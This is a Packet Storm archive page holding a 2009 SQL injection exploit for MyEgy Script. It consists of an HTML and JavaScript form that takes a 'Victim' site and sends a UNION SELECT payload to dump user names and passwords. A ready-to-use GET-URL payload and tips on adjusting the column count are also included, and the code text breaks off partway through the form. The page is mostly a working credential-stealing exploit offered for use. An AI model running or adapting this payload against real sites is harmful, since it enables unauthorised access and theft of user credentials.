what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MyEgy Script SQL Injection

MyEgy Script SQL Injection
Posted Jun 30, 2009
Authored by Karar alShaMi, Sheko

MyEgy Script suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 344a20a85a52a308d091f3c0bf9281361d30a96cb16daed4ba3ee34709bde521

MyEgy Script SQL Injection

Change Mirror Download
<html>
<!--
Script Name :MyEgy Script
Authur : Karar alShaMi & Sheko (El3akrab Elmodamer)
Email :   K4rar@yahoo.com ,  ahmed_sheko998@yahoo.com
Demo : http://www.7obonlin.com
Exploit : Write the site in (Victim) field then submit the form :)
AdminCp : /?do=login
Note : each color of myegy script have a different columns number so try to change the (Columns number) field
to 6 or 7 or 9 if the exploit failed with 8 :)
Note 2 : We Can Use Get Method To Exploit This Vulnerability
See line 64 $cat = $_REQUEST['c'];
So we Can Exploit it in this way
http://localhost/myegy/?c=[Sql]
[Sql] = -1+union+select+1,2,3,4,concat(name,0x3a,password),6,7,8+from+users--
//-->
<head><title>MyEgy Explo!t</title>
<style type="text/css">
..style1 {
 text-align: center;
}
</style>
</head>
<body>
<script language="Javascript">
function doit(si,co){
 for(var n =1;n<co;n++){
 if(tmp){
 var tmp = tmp+n+",";
  }else{
 var tmp = n+",";
 }
  }
tmp =tmp.replace(5,"concat(name,0x3a,password)");
document.f0.action=si+'/';
document.f0.c.value='-1/**/union/**/select/**/'+tmp+co+'/**/from/**/users--';
document.f0.submit;
}
</script>
<form name="f0" method="post">
<p class="style1">My Egy Explo!t</p>
<p class="style1">By : Karar alShaMi & Sheko</p>
<p class="style1">Victim: <input name="site" type="text" style="width: 253px" value="


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close